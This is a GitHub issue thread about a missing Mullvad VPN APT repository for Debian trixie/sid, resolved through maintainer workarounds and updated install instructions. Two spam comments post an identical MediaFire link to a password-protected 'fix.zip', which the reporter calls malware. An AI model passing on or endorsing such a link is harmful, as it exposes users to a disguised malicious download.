### ISSUE TITLE
The repository 'https://repository.mullvad.net/deb/beta trixie Release' does not have a Release file.

### ISSUE THREAD

**Issue by meedstrom** [mullvad/mullvadvpn-app#6676]
### Is it a bug?

- [X] I know this is an issue with the app, and contacting Mullvad support is not relevant.

### I have checked if others have reported this already

- [X] I have checked the issue tracker to see if others have reported similar issues.

### Current Behavior

I cannot upgrade the app through APT repositories.  The reason is clear:

```
$ sudo apt update
Ign:1 https://repository.mullvad.net/deb/beta trixie InRelease                 
Hit:2 http://deb.debian.org/debian sid InRelease                               
Err:3 https://repository.mullvad.net/deb/beta trixie Release                   
  404  Not Found [IP: 45.149.104.1 443]
Hit:4 https://updates.signal.org/desktop/apt xenial InRelease                  
Hit:5 https://packages.cloud.google.com/apt cloud-sdk InRelease     
Ign:6 https://proget.makedeb.org makedeb InRelease
Get:7 https://download.docker.com/linux/debian bookworm InRelease [43.3 kB]    
Hit:8 https://pkg.surfacelinux.com/debian release InRelease                    
Get:9 https://proget.makedeb.org makedeb Release [7,608 B]
Error: The repository 'https://repository.mullvad.net/deb/beta trixie Release' does not have a Release file.
Notice: Updating from such a repository can't be done securely, and is therefore disabled by default.
Notice: See apt-secure(8) manpage for repository creation and user configuration details.
```

If I then try to upgrade it anyway:

    $ sudo apt upgrade mullvad-vpn
    mullvad-vpn is already the newest version (2024.4~beta1).

which is definitely not the newest version.

### Expected Behavior

I expect that `sudo apt update && sudo apt upgrade` should upgrade the Mullvad app.

### Steps to Reproduce

I'm not certain this will reproduce, since it would take me a few months to verify ;) but:

1. Run Debian sid
2. Set up the beta repo per instructions https://mullvad.net/en/download/vpn/linux#beta
3. Install the app
4. Wait for the next version of the app and try to upgrade

### Operating system version

Debian sid

### Mullvad VPN app version

2024.4~beta1

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by meedstrom** [comment]
> Download https//www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Hmm, Github has no button for reporting malware?

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Serock3** [comment]
Hello! Unfortunately, we do not have a repository for Debian 13 (trixie) yet. Could you try manually installing the package file? https://mullvad.net/en/download/vpn/linux#install-manual

**Comment by meedstrom** [comment]
I can, yes! 

Guess this may not be a bug... I always thought there was a repo for trixie since I was able to install in the first place.  Maybe I had installed it before bumping the system to sid though.

**Comment by Serock3** [comment]
I dug into this a bit more, and it seems to be a bug on our end after all. We have repositories for both the testing and unstable  (sid) versions of Debian, but the instructions at <https://mullvad.net/en/download/vpn/linux> seem to be broken for these versions. I have added the problem to our issue tracker, thanks for reporting it 🙂

**Comment by Serock3** [comment]
The problem seems to be that `$(lsb_release -cs)` resolves to `trixie` in your case and not `testing`.

If you want to help us test a workaround for this, you could uninstall the app, using `dpkg -r mullvad-vpn`, then run

```
echo "deb [signed-by=/usr/share/keyrings/mullvad-keyring.asc arch=$( dpkg --print-architecture )] https://repository.mullvad.net/deb/stable testing main" | sudo tee /etc/apt/sources.list.d/mullvad.list
```
and re-install the app using
```
sudo apt update
sudo apt install mullvad-vpn
```

Let me know if that solves the issue 🙂

**Comment by meedstrom** [comment]
Ah yes, it works, thanks a bunch! I forgot to comment.

**Comment by DigiThax** [comment]
your website still has the older instructions fyi

**Comment by drewkiimon** [comment]
Also here to say that the instructions for Debian OS are incorrect on the site, but the command above works.

**Comment by panzer-arc** [comment]
I get a similar issue on Mint if I don't use the above work around.

**Comment by Serock3** [comment]
The instructions on the website have been updated since this issue was opened, and we believe that they should work regardless of distro version. If that's not the case, then I'm going to need more information. 

If you're still having issues, please:
1. Follow *the entire* current "Ubuntu/Debian" installation instructions at <https://mullvad.net/en/download/vpn/linux>.
2. If they fail, please post the error message and the contents of `/etc/apt/sources.list.d/mullvad.list`.

@emirkmo The updated instructions do not contain distro-version anymore, the `/etc/apt/sources.list.d/mullvad.list` file should point to `https://repository.mullvad.net/deb/stable stable main` for everybody. Besides, <https://repository.mullvad.net/deb/stable/dists/testing/> points to the same page as <https://repository.mullvad.net/deb/stable/dists/stable/>. The instructions in my previous post should be functionally identical to what's currently on the website.

**Comment by meedstrom** [comment]
@Serock3 So you know, I only reopened the issue because people kept posting, but I don't have the problem, so you can close if you prefer.

I've just tested the instructions from the website, and they work for me, both stable and beta. (I did remember to remove my old `/etc/apt/sources.list.d/mullvad.sources` as well.)

Bonus: Since this thread is about trixie, you guys probably want to stop APT printing messages about transition to the deb822 sources format. So for reference, content of a `mullvad.sources` instead of `mullvad.list`:

```
Types: deb
URIs: https://repository.mullvad.net/deb/beta/
Suites: beta
Components: main
Signed-By: /usr/share/keyrings/mullvad-keyring.asc
```

Don't forget to delete `mullvad.list` and any stale config you may have inside `/etc/apt/sources.list`.

**Comment by Serock3** [comment]
@meedstrom Thank you for testing! I'll keep the issue open for a while to see if anyone still has problems with the instructions.

I'll bring up the feedback about the deb822 format with the team 🙂

**Comment by Serock3** [comment]
Seems to be little traffic here, so I'll consider the issue solved. Feel free to reopen the issue or make a new one if the problem persists.
